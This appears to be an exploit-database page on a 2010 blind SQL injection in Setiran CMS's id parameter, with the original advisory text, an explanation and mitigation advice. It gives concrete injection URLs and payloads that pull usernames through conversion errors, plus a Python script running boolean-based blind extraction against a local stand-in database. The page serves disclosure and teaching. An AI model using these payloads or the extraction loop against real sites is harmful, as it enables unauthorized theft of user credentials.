vendor:
Setiran CMS
by:
Th3 RDX
CVSS: 7.5 (HIGH)
CWE-89: Blind SQL injection
Product Name: Setiran CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Demo Site
Date: 2010

Setiran CMS Blind SQL Injection Vulnerability

Setiran CMS is vulnerable to blind SQL injection through the `id` parameter: the value taken from the URL is placed into a SQL statement without validation or parameterization, so an attacker can append arbitrary SQL to it. The advisory names two injection points, http://server/Setiran/index.asp?id=[BSQLi CODE] and http://server/Setiran/?id=522[BSQLi CODE] (the site root evidently routes to the same handler). Payloads of the form http://server/Setiran/index.asp?id=1' and 1=convert(int,(select top 1 username from users))-- and http://server/Setiran/?id=522' and 1=convert(int,(select top 1 username from users))-- illustrate the attack. Note that these are not blind in the strict sense: convert(int, ...) forces a type-conversion error whose message discloses the selected value, whereas a purely blind attack infers data from differences in page content or response time. The .asp extension and the convert(int, ...) / top 1 syntax point to a Microsoft SQL Server backend, and the `users` table and `username` column are assumed names; the advisory itself states neither.

Mitigation:

Validate that `id` is an integer before it reaches the database and pass it as a bound parameter (in classic ASP, an ADODB.Command with a typed parameter) instead of concatenating it into the query text. Two defence-in-depth measures limit the damage of any injection that remains: run the application's database login with least privilege, so it cannot read the users table or other data the page does not need, and return a generic error page instead of raw database errors, which closes the error-based disclosure channel (though not the injection itself).
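The script below is an added example, not code from the advisory or from Setiran CMS. It reproduces the defect the advisory describes (the raw `id` value concatenated into a query) against an in-memory SQLite stand-in, shows the hardened form beside it, and then runs a boolean-based blind extraction against both, which is the technique a truly blind injection relies on when no error message is returned. The table and column names (`articles`, `users`, `username`), the sample rows, and the query-building functions are constructed assumptions; `unicode()`, `substr()` and `LIMIT 1` are the SQLite spellings of what would be `ASCII()`, `SUBSTRING()` and `TOP 1` on SQL Server, since SQLite has no `convert(int, ...)`.

```python
import re
import sqlite3

# Constructed stand-in for the CMS database. The table and column names
# (articles, users, username) and the rows are assumptions for this example;
# the advisory does not document Setiran CMS's schema.
_SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO articles VALUES (1, 'Welcome'), (522, 'Contact');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'editor', 'pa55w0rd');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """The defect: the raw ?id= value is concatenated into the SQL text,
    the way classic-ASP code of that era typically did with Request("id").
    Returns the article title, or None when no row matches."""
    sql = "SELECT title FROM articles WHERE id='" + id_param + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(conn, id_param):
    """Hardened form: reject anything that is not a small positive integer,
    then bind the value as a query parameter so it is data, never SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return None  # a real handler would answer 400 Bad Request
    row = conn.execute("SELECT title FROM articles WHERE id=?",
                       (int(id_param),)).fetchone()
    return row[0] if row else None


def make_oracle(lookup, conn, base_id="522"):
    """Turns a page lookup into a boolean oracle: True when the injected
    condition holds (the article is still returned), False otherwise.
    Against a live target this would be an HTTP GET comparing the body."""
    def oracle(condition):
        payload = base_id + "' and (" + condition + ")--"
        return lookup(conn, payload) is not None
    return oracle


def blind_extract(oracle, scalar_subquery, max_len=64):
    """Boolean-based blind extraction of a string one character at a time,
    with a binary search over the code point (7 oracle calls per character).
    Stops when substr() runs past the end: unicode('') is NULL in SQLite,
    so every comparison is false and the search bottoms out at 0."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s),%d,1)) > %d" % (scalar_subquery, pos, mid)
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    sub = "select username from users order by id limit 1"
    print("vulnerable:", blind_extract(make_oracle(vulnerable_lookup, db), sub))
    print("hardened:  ", repr(blind_extract(make_oracle(safe_lookup, db), sub)))
```

The oracle never sees an error message; it only observes whether the article for id 522 comes back, which is exactly the signal the advisory's `[BSQLi CODE]` placeholder leaves to the attacker. The same loop with the parameterized lookup extracts nothing, because the payload fails the integer check before any SQL is built.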
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Setiran CMS Blind SQL injection Vulnerable
# Date: 1-07-2010
# Author: Th3 RDX
# Software Link:
# Version: n/a
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky, r0073r(inj3ct0r.com),
                          Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RooT Bro waiting for u to come online desperately and missing you alot :(
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Setiran CMS Blind SQL injection Vulnerable

----- [ Vendor ] -----

http://www.setiran.com/

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Injection (s) ] -----

----- [ BSQL Injection ] -----

Put [BSQLi CODE]

[Link] http://server/Setiran/index.asp?id=[BSQLi CODE]

[Link] http://server/Setiran/?id=522[BSQLi CODE]


                                                        %\\
##############################################################################

##############################################################################
%//

                                                       %\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN

=> c0d3 for motherland, h4ck for motherland

==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 1 July 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#